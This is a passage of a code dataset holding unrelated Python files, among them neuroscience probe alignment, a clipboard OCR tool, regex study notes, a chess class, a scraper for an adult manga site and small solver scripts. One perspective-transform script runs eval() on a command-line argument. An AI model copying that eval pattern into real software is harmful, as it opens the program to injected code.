\"\"\"\r\n region_ids = brain_atlas.get_labels(xyz_coords)\r\n region_info = brain_atlas.regions.get(region_ids)\r\n boundaries = np.where(np.diff(region_info.id))[0]\r\n region = np.empty((boundaries.size + 1, 2))\r\n region_label = np.empty((boundaries.size + 1, 2), dtype=object)\r\n region_id = np.empty((boundaries.size + 1, 1), dtype=int)\r\n region_colour = np.empty((boundaries.size + 1, 3), dtype=int)\r\n for bound in np.arange(boundaries.size + 1):\r\n if bound == 0:\r\n _region = np.array([0, boundaries[bound]])\r\n elif bound == boundaries.size:\r\n _region = np.array([boundaries[bound - 1], region_info.id.size - 1])\r\n else:\r\n _region = np.array([boundaries[bound - 1], boundaries[bound]])\r\n _region_colour = region_info.rgb[_region[1]]\r\n _region_label = region_info.acronym[_region[1]]\r\n _region_id = region_info.id[_region[1]]\r\n _region = depth_coords[_region]\r\n _region_mean = np.mean(_region)\r\n region[bound, :] = _region\r\n region_colour[bound, :] = _region_colour\r\n region_id[bound, :] = _region_id\r\n region_label[bound, :] = (_region_mean, _region_label)\r\n\r\n return region, region_label, region_colour, region_id\r\n\r\n def get_scale_factor(self, region):\r\n \"\"\"\r\n Find how much each brain region has been scaled following interpolation\r\n :param region: scaled histology boundaries\r\n :type region: np.array((n_bound, 2)) n_bound: no. of histology boundaries\r\n :return scaled_region: regions that have unique scaling applied\r\n :type scaled_region: np.array((n_scale, 2)) n_scale: no. of uniquely scaled regions\r\n :return scale_factor: scale factor applied to each scaled region\r\n :type scale_factor: np.array((n_scale))\r\n \"\"\"\r\n scale = []\r\n for iR, (reg, reg_orig) in enumerate(zip(region, self.region * 1e6)):\r\n scale = np.r_[scale, (reg[1] - reg[0]) / (reg_orig[1] - reg_orig[0])]\r\n boundaries = np.where(np.diff(np.around(scale, 3)))[0]\r\n if boundaries.size == 0:\r\n scaled_region = np.array([[region[0][0], region[-1][1]]])\r\n scale_factor = np.unique(scale)\r\n else:\r\n scaled_region = np.empty((boundaries.size + 1, 2))\r\n scale_factor = []\r\n for bound in np.arange(boundaries.size + 1):\r\n if bound == 0:\r\n _scaled_region = np.array([region[0][0],\r\n region[boundaries[bound]][1]])\r\n _scale_factor = scale[0]\r\n elif bound == boundaries.size:\r\n _scaled_region = np.array([region[boundaries[bound - 1]][1],\r\n region[-1][1]])\r\n _scale_factor = scale[-1]\r\n else:\r\n _scaled_region = np.array([region[boundaries[bound - 1]][1],\r\n region[boundaries[bound]][1]])\r\n _scale_factor = scale[boundaries[bound]]\r\n scaled_region[bound, :] = _scaled_region\r\n scale_factor = np.r_[scale_factor, _scale_factor]\r\n return scaled_region, scale_factor\r\n\r\n def get_channel_locations(self, feature, track, depths=None):\r\n \"\"\"\r\n Gets 3d coordinates from a depth along the electrophysiology feature. 2 steps\r\n 1) interpolate from the electrophys features depths space to the probe depth space\r\n 2) interpolate from the probe depth space to the true 3D coordinates\r\n if depths is not provided, defaults to channels local coordinates depths\r\n \"\"\"\r\n if depths is None:\r\n depths = self.chn_depths / 1e6\r\n # nb using scipy here so we can change to cubic spline if needed\r\n channel_depths_track = self.feature2track(depths, feature, track) - self.track_extent[0]\r\n xyz_channels = histology.interpolate_along_track(self.xyz_track, channel_depths_track)\r\n return xyz_channels\r\n\r\n def get_brain_locations(self, xyz_channels):\r\n \"\"\"\r\n Finds the brain regions from 3D coordinates of electrode locations\r\n :param xyz_channels: 3D coordinates of electrodes on probe\r\n :type xyz_channels: np.array((n_elec, 3)) n_elec: no. of electrodes (384)\r\n :return brain_regions: brain region object for each electrode\r\n :type dict\r\n \"\"\"\r\n brain_regions = brain_atlas.regions.get(brain_atlas.get_labels(xyz_channels))\r\n return brain_regions\r\n\r\n def get_perp_vector(self, feature, track):\r\n \"\"\"\r\n Finds the perpendicular vector along the trajectory at the depth of reference lines\r\n :param feature: reference coordinates in feature space (ephys plots)\r\n :type feature: np.array((n_lines + 2)) n_lines: no. of user reference lines\r\n :param track: reference coordinates in track space (histology track)\r\n :type track: np.array((n_line+2))\r\n :return slice_lines: coordinates of perpendicular lines\r\n :type slice_lines: np.array((n_lines, 2))\r\n \"\"\"\r\n\r\n slice_lines = []\r\n for line in feature[1:-1]:\r\n depths = np.array([line, line + 10 / 1e6])\r\n xyz = self.get_channel_locations(feature, track, depths)\r\n\r\n extent = 500e-6\r\n vector = np.diff(xyz, axis=0)[0]\r\n point = xyz[0, :]\r\n vector_perp = np.array([1, 0, -1 * vector[0] / vector[2]])\r\n xyz_per = np.r_[[point + (-1 * extent * vector_perp)],\r\n [point + (extent * vector_perp)]]\r\n slice_lines.append(xyz_per)\r\n\r\n return slice_lines\r\n","sub_path":"ibllib/pipes/ephys_alignment.py","file_name":"ephys_alignment.py","file_ext":"py","file_size_in_byte":15958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218797190","text":"from transform import *\nimport numpy as np\nimport cv2\nimport argparse\n\n#constructing an argparse\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\" , \"--image\" ,help = \"path to the image to be transformed\")\nap.add_argument(\"-c\" , \"--coordinates\",\n help = 'coordiantes of the image you perspective changed')\nargs = vars(ap.parse_args())\nimage = cv2.imread(args[\"image\"])\npts = np.array(eval(args[\"coordinates\"]), dtype ='float32')\nwarped = four_point_transform(image, pts)\ncv2.namedWindow('image', cv2.WINDOW_NORMAL)\ncv2.imshow('image' , warped)\ncv2.waitKey(0)\n","sub_path":"top_to_bottom perspective transform/transform_example.py","file_name":"transform_example.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"590962187","text":"import pyperclip\r\nimport pytesseract\r\nfrom PIL import ImageGrab\r\nfrom PIL import Image #Image is required to load input image in PIL format\r\nimport pytesseract #pytesseract is used to recognise the text from image \r\nimport imagehash\r\nfrom win10toast import ToastNotifier\r\n\r\n\r\ndef run_ocr(image_file):\r\n pytesseract.pytesseract.tesseract_cmd='C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe' # specifying the path to the tesseract.exe file\r\n img = Image.open(image_file) # accessing the image \r\n output_text = pytesseract.image_to_string(img) # converting the image contents to string\r\n # print(output_text) # printing the image contents in terminal\r\n return output_text\r\n\r\n\r\ndef compare_img(im1, im2):\r\n if im1 == None or im2 == None:\r\n return False\r\n\r\n h1 = imagehash.average_hash(im1)\r\n h2 = imagehash.average_hash(im2)\r\n\r\n if abs(h1 - h2) == 0:\r\n return True # images are same\r\n else:\r\n return False\r\n\r\n\r\ndef toast_notif(text):\r\n '''Toast a notification in Windows10'''\r\n notif = ToastNotifier()\r\n notif.show_toast(\"SnapBoard OCR\", text)\r\n\r\n\r\nimage_file = 'snap.png'\r\n\r\n# img = ImageGrab.grabclipboard()\r\n# img.save(image_file,'PNG')\r\n\r\n# text = run_ocr(image_file)\r\n\r\n# pyperclip.copy(text)\r\n\r\n# print(text)\r\n\r\nprev_img = None\r\n\r\nwhile True:\r\n img = ImageGrab.grabclipboard()\r\n # print(img)\r\n\r\n if img == None:\r\n continue\r\n\r\n if compare_img(img, prev_img) == False:\r\n img.save(image_file,'PNG')\r\n text = run_ocr(image_file)\r\n pyperclip.copy(text)\r\n print(text)\r\n toast_notif(text)\r\n prev_img = img\r\n\r\n\r\n","sub_path":"imageconvertor.py","file_name":"imageconvertor.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483348476","text":"# this is saveSurfaces.py\ns = SaveWindowAttributes()\ns.format, s.fileName = s.PNG, 'iso'\ns.outputToCurrentDirectory = 0\ns.outputDirectory = \"/Users/razoumov/Documents/teaching/visitWorkshop\"\nSetSaveWindowAttributes(s)\nfor i in range(3):\n isoAtts.contourValue = 2. + i*1.5\n SetOperatorOptions(isoAtts)\n name = SaveWindow()\n","sub_path":"scripts/saveSurfaces.py","file_name":"saveSurfaces.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595542685","text":"# -*- comding:utf-8 -*-\ndef testzz_z():\n ''' 正则学习 '''\n import re\n #findall 匹配一个列表\n #search,match 匹配一次之后就不匹配了match类型,search匹配有很多正则比较好\n s = '13978962341asdad1497896232212313asdad 0123-67823456 very very vary 192.168.213.123'\n\n n = re.findall(r'1\\d{10}', s )\n print(\"正则取出来的值:\",n , \"他的格式:\", type(n))\n print('取列表第一个:',n[0], type(n[0]))\n\n print('--'*10)\n\n b = re.search(r'1\\d{10}', s) #1开头,后面10位\n print(\"正则取出来的值:\", b ,\"他的格式:\", type(b))\n print('只取一次:', b.group(),type(b.group()))\n\n print('--' * 10)\n m = re.findall(r'\\d{3,4}-\\d{7,8}', s) #前面3-4位数字,后面7-8位数字\n print(m)\n\n print('--' * 10)\n w = re.findall(r'(14|13)\\d{9}', s) #['13', '14']\n w1 = re.search(r'(14|19)\\d{9}', s) #<_sre.SRE_Match object; span=(16, 27), match='14978962322'>\n w2 = re.match(r'(14|19)\\d{9}', s)\n print(w,w1,w2)\n\n print('--' * 10)\n m = re.findall(r'(very)\\s+\\1', s) #['very']\n m1 = re.search(r'(very)\\s+\\1', s) #<_sre.SRE_Match object; span=(54, 63), match='very very'>\n m2 = re.match(r'(very)\\s+\\1', s)\n print(m,m1,m2)\n\n print('--' * 10)\n m = re.findall(r'1\\d{10}(?=123)', s) #断言,判断后面一定有123\n print(m)\n\n print('--' * 10)\n m = re.findall(r'(?:(\\d{1,3}).){3}(\\d{1,3})', s)\n m1 = re.search(r'(?:(\\d{1,3}).){3}(\\d{1,3})', s)\n m2 = re.match(r'(very)\\s+\\1', s)\n print(m)\n print(m1)\n \ndef test_pkip():\n #匹配合法的ip地址\n line = \"\"\"\\\n 192.168.1.150\n 0.0.0.0\n 255.255.255.255\n 17.16.52.100\n 172.16.0.100\n 400.400.999.888\n 001.022.003.000\n 257.257.255.256 \"\"\"\n\n\n import socket\n for i,ip in enumerate(line.splitlines()):\n print(ip)\n try:\n net = socket.inet_aton(ip)\n except Exception as e :\n print(i , ip , e)\n print(i, net)\nimport re\ndef tes_ftp():\n #选出含有ftp的链接,且文件类型是gz或者xz的文件名\n s = 'http://ftp.altlinux.org/pub/people/legion/kbd/kbd-1.15.5.tar.gz'\n m = re.findall(r'ftp.*/(.*\\.(?:gz|xz))', s)\n print(m)\n\n\ndef test_zzzz():\n test = '''agsodahkjsd\\nasbdas\\nasda\\wqeq\\nAppLE'''\n\n #每次执行编译一次\n matcher = re.match('ags', test, re.I) \n print(matcher)\n\n print('---'*10)\n\n #先编译,然后执行\n regex = re.compile('b.+', re.S) #re.S 多行 re.I 忽略大小写 re.M 从多行查找,如果指定了第几位会找不到后面的数据\n matcher = regex.match(test) # 第一个参数,是从什么文本查找\n print(matcher)\n print('---'*10)\n\n\n matcher = regex.search(test, 8) #第二个参数是从多少位开始查找 \n print(matcher)\n print('---'*10)\n\n matcher = regex.fullmatch(test, 9,25) #全匹配\n print(matcher)\n print('---'*10)\n\n\n matcher = re.findall('b.+', test) #全文匹配\n print(matcher)\n print('---'*10)\n\n\n matcher = re.finditer('b.+', test) #全文匹配\n print(matcher)\n print('---'*10)\n\n\n\n\n #匹配后替换参数sub\n #匹配正则,替换内容,文本内容,替换次数,立即替换\n print(re.sub('a\\w+d', 'www', test, 10).encode())\n print('---'*10)\n\n #n 的意思是,返回替换成功的值并告诉你替换了几次\n print(re.subn('a\\w+d', 'www', test, 10))\n print('---'*10)\n\n #正则提取分隔\n test = '''asda\\n\\t (baf)\\nasd'''\n regex = re.compile('[\\s()]+') #空格分隔\n print(regex.split(test))\n\n\n #带有空格,数字等,切割\n test = '''01 asda\n 123 asda\n 12 asda \n 100 asdas'''\n regex = re.compile('\\s+\\d+\\s+') #空格分隔\n print(regex.split(test))\n\n regex = re.compile('^\\d+\\s+|\\s+\\d+\\s+') #空格分隔\n print(regex.split(test))\n\n\n\n# match、search函数可以返回match对象;findall返回字符串列表;finditer返回一个个match对象\n# 如果pattern中使用了分组,如果有匹配的结果,会在match对象中\n# 1. 使用group(N)方式返回对应分组,1到N是对应的分组,0返回整个匹配的字符串\n# 2. 如果使用了命名分组,可以使用group('name')的方式取分组\n# 3. 也可以使用groups()返回所有组\n# 4. 使用groupdict() 返回所有命名的分组\n\n\n #匹配邮箱地址\n\n testeail = '''\n test@hot-mail.com\n v-ip@magedu.com\n web.manager@magedu.com.cn\n super.user@google.com\n ashdajjlkj@163.com\n ahsdkl@qq.com\n qweiqpowei@aadsad.cn\n 123981273981@qq.com\n a@w-a-com\n '''\n regex = re.compile(r'[-\\w.]+@[-\\w.]+\\.\\w+') \n matcher = regex.findall(testeail) \n print(matcher)\n\n #匹配html标记内的内容\n\n\n str1 = \"\"\"马哥教育\n \n \"\"\"\n\n regex = re.compile(r']*>(.*)') #<(div)[^<>]*>( .*) 分组div 变量第一个分组\\1 ,可以改a,或者其他标签\n matcher = regex.findall(str1) \n print(matcher)\n\n\n #匹配URL\n\n testurl = '''\n http://www.magedu.com/index.html\n https://login.magedu.com\n file:///ect/sysconfig/network\n '''\n regex = re.compile(r'[a-zA-Z]+://[^\\s]*[.com|.cn]') \n matcher = regex.findall(testurl) \n print(matcher)\n\n\n #匹配二代中国身份证ID\n testid = '''\n 321105700101003\n 321105197001010030\n 11210020170101054X\n 17位数字+1位校验码组成\n 前6位地址码,8位出生年月,3位数字,1位校验位(0-9或X)\n '''\n regex = re.compile(r'\\d{17}[\\dxX]|\\d{15}') \n matcher = regex.findall(testid) \n print(matcher)\n\n #判断密码强弱\n # 要求密码必须由 10-15位 指定字符组成:\n # 十进制数字\n # 大写字母\n # 小写字母\n # 下划线\n # 要求四种类型的字符都要出现才算合法的强密码\n # 例如:Aatb32_67mnq,其中包含大写字母、小写字母、数字和下划线,是合格的强密码\n testsfz = ''' Aatb32_67mnq\n '''\n\n regex = re.compile(r'^[a-zA-Z0-9_]{10,15}$') \n matcher = regex.findall(testsfz) \n print(matcher)\n\n\n# //密码强弱程度(我把原来正则表达式后面的g都去掉了)\n# //弱\n# var week = /^([a-zA-Z]){6,16}$|^(\\d){6,16}$|^((?=[\\x21-\\x7e]+)[^A-Za-z0-9]){6,16}$|^(?!\\2+$)(?!\\1+$)[\\2\\1]{6,7}$|^(?!\\3+$)(?!\\1+$)[\\3\\1]{6,7}$|^(?!\\3+$)(?!\\2+$)[\\2\\3]{6,7}$|^(?=.*\\3)(?=.*\\1)(?=.*\\2)[a-zA-Z\\x21-\\x7e\\d]{6,7}$/;\n# //中:字母+数字\n# var middle1 = /^(?!\\d+$)(?![a-zA-Z]+$)[\\dA-Za-z]{8,16}$/;\n# //中:字母+字符\n# var middle2 = /^(?!((?=[\\x21-\\x7e]+)[^A-Za-z0-9])+$)(?![a-zA-Z]+$)[^\\u4e00-\\u9fa5\\d]{8,16}$/;\n# //中:数字+字符\n# var middle3 = /^(?!((?=[\\x21-\\x7e]+)[^A-Za-z0-9])+$)(?!\\d+$)[^\\u4e00-\\u9fa5a-zA-Z]{8,16}$/;\n# //强\n# var strong = /^(?=.*((?=[\\x21-\\x7e]+)[^A-Za-z0-9]))(?=.*[a-zA-Z])(?=.*[0-9])[^\\u4e00-\\u9fa5]{8,13}$/;\n# //最强\n# var strongest = /^(?=.*((?=[\\x21-\\x7e]+)[^A-Za-z0-9]))(?=.*[a-zA-Z])(?=.*[0-9])[^\\u4e00-\\u9fa5]{14,16}$/;\n\n\n\n\n\n# 1、用户名正则\n\n# //用户名正则,4到16位(字母,数字,下划线,减号)\n# var uPattern = /^[a-zA-Z0-9_-]{4,16}$/;\n\n# 2、Email正则\n\n# //Email正则\n# var ePattern = /^([A-Za-z0-9_\\-\\.])+\\@([A-Za-z0-9_\\-\\.])+\\.([A-Za-z]{2,4})$/;\n\n# 3、手机号正则\n\n# //手机号正则\n# var mPattern = /^((13[0-9])|(14[5|7])|(15([0-3]|[5-9]))|(18[0,5-9]))\\d{8}$/;\n\n# 4、身份证正则\n\n# //身份证号(18位)正则\n# var cP = /^[1-9]\\d{5}(18|19|([23]\\d))\\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx]$/;\n# 5、IPV4地址正则\n\n# //ipv4地址正则\n# var ipP = /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;\n# 6、QQ号正则\n\n# //QQ号正则,5至11位\n# var qqPattern = /^[1-9][0-9]{4,10}$/;\n\n# 7、微信号正则\n\n# //微信号正则,6至20位,以字母开头,字母,数字,减号,下划线\n# var wxPattern = /^[a-zA-Z]([-_a-zA-Z0-9]{5,19})+$/;\n\n# 8、车牌号正则\n\n# //车牌号正则\n# var cPattern = /^[京津沪渝冀豫云辽黑湘皖鲁新苏浙赣鄂桂甘晋蒙陕吉闽贵粤青藏川宁琼使领A-Z]{1}[A-Z]{1}[A-Z0-9]{4}[A-Z0-9挂学警港澳]{1}$/;\n\n# 9、包含中文正则\n\n# //包含中文正则\n# var cnPattern = /[\\u4E00-\\u9FA5]/;\n\n\n\n # #单词统计\n\n chekword = '''\\\n host\n maowe\n asdaksd\n host\n '''\n regex = re.compile('[^\\w-]+') \n def makekey3(line:str):\n for word in regex.split(line):\n if len(word):\n yield word\n\n for i in makekey3(chekword):\n print(i)\n\n\n\n# 邮箱\n# \\w+[-. \\w]*@[\\w-]+(\\.[\\w-]+)+\n# html提取\n# <[^<>]+>(.*)<[^<>]+>\n# 如果要���配标记a\n# r'<(\\W+)[^<>]+>(.*)()'\n# URL提取\n# (\\w+)://([^\\s]+)\n# 身份证验证\n# 身份证验证需要使用公式计算,最严格的应该实名验证。\n# \\d{17}[0-9xX]|\\d{15}\n# 强密码\n# Aatb32_ _67mnq\n# Aatb32_ _67m. nq\n# 中国是一个伟大的国家aA_ 8\n# 10-15位,其中包含大写字母、小写字母、数字和下划线\n# ^\\W{10,15}$\n# 如果测试有不可见字符干扰使用^\\W{10,15}\\r?$\n# 看似正确,但是,如果密码有中文呢?\n# ^[a-ZA-Z0-9_ ]{10,15}$\n\n\n","sub_path":"mag363/Completed/200829_re.py","file_name":"200829_re.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454787853","text":"WHITE = 0\nBLACK = 1\n\nblack = lambda x: \"\\033[38;5;0m\" + x + \"\\033[0m\"\nwhite = lambda x: \"\\033[38;5;15m\" + x + \"\\033[0m\"\n\n\nclass Piece(object):\n '''Class for chess pieces'''\n\n def __init__(self, board, color, position):\n '''__init__(board, color, position)\n\n 'board' is a Board object\n 'color' is an integer, 1 for black, 0 for white\n 'position' is an integer tuple like (1, 3) or (3, 5) for default\n '''\n self.color = color\n self.position = position\n\n def get_name(self):\n '''get_name()\n\n Return piece's name.\n '''\n return self.name\n\n def get_color(self):\n '''get_color()\n\n Return piece's color.\n '''\n return self.color\n\n def get_position(self):\n '''get_position()\n\n Return piece's position.\n '''\n return self.position\n\n def move(self, board, position):\n '''move(board, position) -> bool\n\n 'board' is a Board object\n 'position' is an integer tuple like (1, 3)\n\n Move piece to 'position'. Return True on success, False otherwise.\n '''\n if position in self.possible_moves:\n if board.is_empty(position):\n board.remove_piece(self.position)\n self.position = position\n board.place_piece(self, position)\n return True\n elif board.is_enemy(position, self.color):\n self.attack(board, position)\n return True\n else:\n return False\n else:\n return False\n\n def attack(self, board, position):\n '''attack(board, position)\n\n 'board' is a Board object\n 'position' is an integer tuple like (1, 3)\n\n Attack given 'position'.\n '''\n board.remove_piece(position)\n self.move(board, position)\n\n def calculate_possibles(self, board):\n '''calculate_possibles(board)\n\n 'board' is a Board object\n\n Calculate the set of possible moves.\n '''\n raise NotImplementedError(\"This is the parent.\")\n\n def check(self, board):\n '''check(board)\n\n 'board' is a Board object\n\n Check if the opponent's king is in check.\n '''\n if self.color == WHITE:\n opponent = black\n else:\n opponent = white\n\n for move in self.possible_moves:\n if not board.is_empty(move):\n if board.get_piece(move).get_name() == opponent(\"K\"):\n return True\n\n return False\n","sub_path":"piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558269336","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport requests\nfrom animezilla_18h.items import Animezilla18HItem\n\nclass Spider18hSpider(scrapy.Spider):\n name = 'Spider_18h'\n allowed_domains = ['18h.animezilla.com']\n start_urls = []\n #for url in open(r'D:\\Spider_download\\animezilla_18h_images\\1.txt'): \n #url = \"'\"+url.strip()+\"'\"\n #print(url) \n #start_urls.append(url)\n for i in range(80,100):\n url = 'https://18h.animezilla.com/manga/'+str(i)\n r = requests.get(url)\n if r.status_code == 200:\n print('%s yes!!!'%url)\n start_urls.append(url)\n\n def parse(self, response):\n #comicname表示漫画名字\n #page 表示当前页数\n #page_num表示漫画总页数\n a = response.css('.entry-header h1::text').extract_first()\n b = a.split(' ')\n c = len(b)\n comicname = ''\n for i in range(0,c-2):\n comicname = comicname + b[i]\n pageinfo = b[c-1]\n page = pageinfo.split('/')[0]\n page_num = pageinfo.split('/')[1]\n print(comicname)\n\n i = 1\n while i <= int(page_num):\n url = response.url+'/'+str(i)\n yield scrapy.Request(url = url,callback=self.parse_image,meta={'comicname':comicname,'page':i})\n i+=1\n\n def parse_image(self, response):\n item = Animezilla18HItem()\n item['image_urls'] = [response.css('.entry-content p img::attr(src)').extract_first()]\n item['image_name'] = response.meta['comicname']\n item['page'] = response.meta['page']\n item['url'] = response.url\n #print(item['image_name']+item['image_urls'])\n yield item\n ","sub_path":"animezilla_18h/spiders/Spider_18h.py","file_name":"Spider_18h.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546060636","text":"# Andy, Ben and Charlotte are playing a board game. The three of them decided to\n# come up with a new scoring system. A player's first initial (\"A\", \"B\" or \"C\")\n# denotes that player scoring a single point. Given a string of capital letters,\n# return a list of the players' scores.\n# For instance, if ABBACCCCAC is written when the game is over, then Andy scored\n# 3 points, Ben scored 2 points, and Charlotte scored 5 points, since there are 3\n# instances of letter A, 2 instances of letter B, and 5 instances of letter C.\n# So the list [3, 2, 5] should be returned.\n# If given an empty string as an input, return [0, 0, 0].\n\ndef calculate_scores(txt):\n result = [0, 0, 0]\n for x in txt:\n if x == 'A':\n result[0] += 1\n elif x == 'B':\n result[1] += 1\n elif x == 'C':\n result[2] += 1\n return result\n\n\n\nprint(calculate_scores(\"A\")) #➞ [1, 0, 0]\nprint(calculate_scores(\"ABC\")) #➞ [1, 1, 1]\nprint(calculate_scores(\"ABCBACC\")) #➞ [2, 2, 3]\n","sub_path":"python-katas/EdabCalcScores.py","file_name":"EdabCalcScores.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"516252869","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2016-2019 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Module tests.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nfrom invenio_records.api import Record\n\nfrom invenio_communities.models import InclusionRequest\n\n\ndef test_community_delete_task(app, db, communities):\n \"\"\"Test the community deletion task.\"\"\"\n (comm1, comm2, comm3) = communities\n communities_key = app.config[\"COMMUNITIES_RECORD_KEY\"]\n rec1 = Record.create({'title': 'Foobar'})\n InclusionRequest.create(community=comm1, record=rec1, notify=False)\n\n assert InclusionRequest.get(comm1.id, rec1.id)\n\n comm1.accept_record(rec1)\n assert 'comm1' in rec1[communities_key]\n\n comm1.delete()\n assert comm1.is_deleted\n","sub_path":"tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116688089","text":"__author__ = 'patras'\n\nfrom domain_springDoor import *\nfrom timer import DURATION\nfrom state import state, rv\n\nDURATION.TIME = {\n 'unlatch1': 5,\n 'unlatch2': 5,\n 'holdDoor': 2,\n 'passDoor': 3,\n 'releaseDoor': 2,\n 'closeDoors': 3,\n 'move': 7,\n 'take': 2,\n 'put': 2,\n}\n\nDURATION.COUNTER = {\n 'unlatch1': 5,\n 'unlatch2': 5,\n 'holdDoor': 2,\n 'passDoor': 3,\n 'releaseDoor': 2,\n 'closeDoors': 3,\n 'move': 7,\n 'take': 2,\n 'put': 2,\n}\n\nrv.LOCATIONS = [1, 2, 3, 4, 5, 6, 7]\nrv.EDGES = {1: [7], 2: [6, 7], 3: [7], 4: [5], 5: [4, 6, 7], 6: [2, 5], 7: [1, 2, 3, 5]}\nrv.DOORS = ['d1', 'd2', 'd3']\nrv.DOORLOCATIONS = {(1, 7): 'd1', (2, 7): 'd2', (5, 6): 'd3'}\nrv.DOORTYPES = {'d1': 'spring', 'd2': 'spring', 'd3': 'spring'}\nrv.ROBOTS = ['r1', 'r2', 'r3', 'r4']\n\ndef ResetState():\n state.load = {'r1': NIL, 'r2': NIL, 'r3': NIL, 'r4': NIL}\n state.status = {'r1': 'free', 'r2': 'free', 'r3': 'free', 'r4': 'free'}\n state.loc = {'r1': 1, 'r2': 2, 'r3': 2, 'r4': 7}\n state.pos = {'o1': 3}\n state.doorStatus = {'d1': 'closed', 'd2': 'closed', 'd3': 'closed', }\n state.doorType = {'d1': UNK, 'd2': UNK, 'd3': UNK, }\n\ntasks = {\n 5: [['fetch', 'r1', 'o1', 6]],\n}\neventsEnv = {\n}","sub_path":"problems/SD/auto/problem104_SD.py","file_name":"problem104_SD.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447864126","text":"\"\"\"\nlz@2019/08/17\nTime Limit Exceeded\n\"\"\"\n\nimport copy\nclass Solution:\n def exist(self, board, word):\n if len(word) < 1:\n return(False)\n m = len(board)\n n = len(board[0])\n result = False\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n subboard = copy.deepcopy(board)\n subboard[i][j] = ' '\n answer = self.existSubstr(subboard, word[1:], i, j, m, n)\n if answer:\n result = True\n return(result)\n\n def existSubstr(self, board, substr, s_i, s_j, m, n):\n if len(substr) <= 0:\n return(True)\n elif len(substr) == 1:\n if substr in self.neighbor(board, s_i, s_j, m, n):\n return(True)\n else:\n return(False)\n else:\n neighbors = self.neighbor(board, s_i, s_j, m, n)\n if substr[0] in neighbors:\n answer = False\n for loc_i, loc_j in neighbors[substr[0]]:\n subboard = copy.deepcopy(board)\n subboard[loc_i][loc_j] = ' '\n result = self.existSubstr(subboard, substr[1:], loc_i, loc_j, m, n)\n if result:\n answer = True\n else:\n return(False)\n return(answer)\n\n def neighbor(self, board, i, j, m, n):\n answer = {}\n if i > 0:\n key = board[i-1][j]\n answer[key] = [(i-1, j)]\n if j > 0:\n key = board[i][j-1]\n if key not in answer:\n answer[key] = [(i, j-1)]\n else:\n answer[key].append((i, j-1))\n if i < (m - 1):\n key = board[i+1][j]\n if key not in answer:\n answer[key] = [(i + 1, j)]\n else:\n answer[key].append((i + 1, j))\n if j < n - 1:\n key = board[i][j+1]\n if key not in answer:\n answer[key] = [(i, j + 1)]\n else:\n answer[key].append((i, j + 1))\n return(answer)\n\n\n","sub_path":"archive/79_word_search_v1.py","file_name":"79_word_search_v1.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370039515","text":"# -*- coding: utf-8 -*-\n#\n# StockChamps\n# Matthew Kwon\n#\n\nfrom dp_tornado.engine.model import Model as dpModel\n\nclass BoardModel(dpModel):\n def get(self, board_seq=None):\n\n if board_seq:\n return self.row(\"\"\"\n SELECT\n *\n FROM\n BOARD\n WHERE\n seq = %s\n \"\"\", board_seq, 'sbscnbc.stockchamps.db/service')\n\n return None\n\n def list(self,\n sort=None,\n offset=0,\n limit=5,\n with_extras=False):\n\n params = []\n\n where_query = \"\"\" deletedate is null \"\"\"\n\n params.append(offset)\n params.append(limit)\n\n order_by = 'idx desc'\n\n output = []\n\n for e in self.rows(\"\"\"\n SELECT\n *\n FROM\n guest_books\n WHERE\n {where_query}\n ORDER BY\n {order_by}\n LIMIT %s, %s\"\"\"\n .replace('{where_query}', where_query)\n .replace('{order_by}', order_by), params,\n 'marry.db/service', to_dict=True):\n output.append({\n 'name': e['name'],\n 'contents': self.helper.marry.string.strip_tags(e['contents']),\n 'createdate': self.helper.datetime.yyyymmdd('-', e['createdate'])\n })\n\n return output\n\n def controller_post(self, controller):\n guest_name = controller.get_argument('guest_name', '').strip()\n contents = self.helper.marry.string.strip_tags(controller.get_argument('contents', '')).strip()\n\n # 이름 값 확인\n if not guest_name:\n return {\n 'result': False,\n 'reason': 'name-missing',\n 'message': self.config.marry.message.board.community_article_post_name_missing}\n\n # 내용 값 확인\n if not contents or not contents.replace(' ', ''):\n return {\n 'result': False,\n 'reason': 'contents-missing',\n 'message': self.config.marry.message.board.community_article_post_contents_missing}\n\n\n ret = self.model.marry.board.post(guest_name, contents)\n\n if not ret:\n return {\n 'result': False,\n 'reason': 'server-error',\n 'message': self.config.marry.message.server_error}\n\n return {\n 'result': True,\n 'reason': 'succeed',\n 'message': self.config.marry.message.common_registered}\n\n def post(self, name, contents):\n\n proxy = 